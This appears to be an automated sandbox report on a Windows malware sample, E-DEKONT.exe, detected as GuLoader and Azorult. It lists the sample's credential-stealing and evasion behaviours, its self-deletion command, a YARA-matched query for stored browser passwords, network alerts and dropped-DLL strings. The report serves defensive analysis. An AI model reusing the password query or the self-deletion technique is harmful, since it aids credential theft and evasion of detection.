Windows Analysis Report
E-DEKONT.exe

Overview

General Information

Sample Name: E-DEKONT.exe
Analysis ID: 755881
MD5: 0aa36eb080cf7171cec271b2cd4d2108
SHA1: eb7f3bf8e15ae16e765e480510d2260a9e9facb8
SHA256: 6ca208edbc718f737f74ee0a631ed22cd2bf67a0db679d9d1702575c087550cc

Detection

Azorult, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Self deletion via cmd or bat file
Tries to harvest and steal ftp login credentials
Tries to harvest and steal Bitcoin Wallet information
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Queries information about the installed CPU (vendor, model number etc)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Contains functionality to enumerate device drivers
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • E-DEKONT.exe (PID: 3880 cmdline: C:\Users\user\Desktop\E-DEKONT.exe MD5: 0AA36EB080CF7171CEC271B2CD4D2108)
    • E-DEKONT.exe (PID: 4868 cmdline: C:\Users\user\Desktop\E-DEKONT.exe MD5: 0AA36EB080CF7171CEC271B2CD4D2108)
      • cmd.exe (PID: 8036 cmdline: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • timeout.exe (PID: 2016 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000004.00000000.108599370042.0000000001660000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000004.00000002.109020742612.000000001D9E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
00000004.00000002.109010127986.000000001D4D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Source | Rule | Description | Author | Strings
4.2.E-DEKONT.exe.1df8883c.5.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
4.2.E-DEKONT.exe.1df8883c.5.raw.unpack | OlympicDestroyer_1 | OlympicDestroyer Payload | kevoreilly |
  • 0x32285c:$string1: SELECT origin_url, username_value, password_value FROM logins
  • 0x3269b7:$string1: SELECT origin_url, username_value, password_value FROM logins
  • 0x197172:$string2: API call with %s database connection pointer
  • 0x197da6:$string3: os_win.c:%d: (%lu) %s(%s) - %s
4.2.E-DEKONT.exe.1df32afc.3.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
4.2.E-DEKONT.exe.1df32afc.3.raw.unpack | OlympicDestroyer_1 | OlympicDestroyer Payload | kevoreilly |
  • 0x37859c:$string1: SELECT origin_url, username_value, password_value FROM logins
  • 0x37c6f7:$string1: SELECT origin_url, username_value, password_value FROM logins
  • 0x1eceb2:$string2: API call with %s database connection pointer
  • 0x1edae6:$string3: os_win.c:%d: (%lu) %s(%s) - %s
4.2.E-DEKONT.exe.1df37450.4.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
                  No Sigma rule has matched
                  Timestamp: 11/29/22-09:20:38.942380
                  Source IP: 192.168.11.20
                  Destination IP: 104.21.44.194
                  SID: 2029468
                  Source Port: 49852
                  Destination Port: 80
                  Protocol: TCP
                  Classtype: A Network Trojan was detected

                  Timestamp: 11/29/22-09:20:40.337285
                  Source IP: 104.21.44.194
                  Destination IP: 192.168.11.20
                  SID: 2029137
                  Source Port: 80
                  Destination Port: 49852
                  Protocol: TCP
                  Classtype: A Network Trojan was detected

                  AV Detection

                  Source: E-DEKONT.exe, Virustotal: Detection: 26%
                  Source: E-DEKONT.exe, ReversingLabs: Detection: 20%
                  Source: E-DEKONT.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\E-DEKONT.exe, Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fivefoldness\Endosseringerne\Fouragen
                  Source: unknown, HTTPS traffic detected: 103.14.99.114:443 -> 192.168.11.20:49851 version: TLS 1.2
                  Source: E-DEKONT.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944571274.000000001E798000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108907116476.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108911584847.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945279969.000000001E7C0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945375034.000000001E7C4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108911467372.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917692756.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr
                  Source: Binary string: mshtml.pdb source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp
                  Source: Binary string: ucrtbase.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934547678.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108931941329.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
                  Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108885630583.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939584393.000000001E710000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108890563485.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940725893.000000001E730000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940858034.000000001E734000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
                  Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108898625241.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108899797081.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944393476.000000001E788000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108905955571.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108911584847.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108912726161.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.4.dr
                  Source: Binary string: mshtml.pdbUGP source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp
                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108889185436.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108901775165.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943865478.000000001E770000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108897608996.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108896445391.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.4.dr
                  Source: Binary string: vcruntime140.i386.pdbGCTL source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963064431.000000001DDA8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938291383.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917692756.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
                  Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108884832188.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108893462615.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
                  Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109036371448.000000001E380000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108884832188.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108885416848.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108885630583.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108910182410.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108910928044.000000001DDD4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108903955995.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108902878047.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108904933284.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108904797866.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
                  Source: Binary string: msvcp140.i386.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108954916729.000000001DAB8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919075540.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919898776.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
                  Source: Binary string: ucrtbase.pdbUGP source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934547678.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108931941329.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
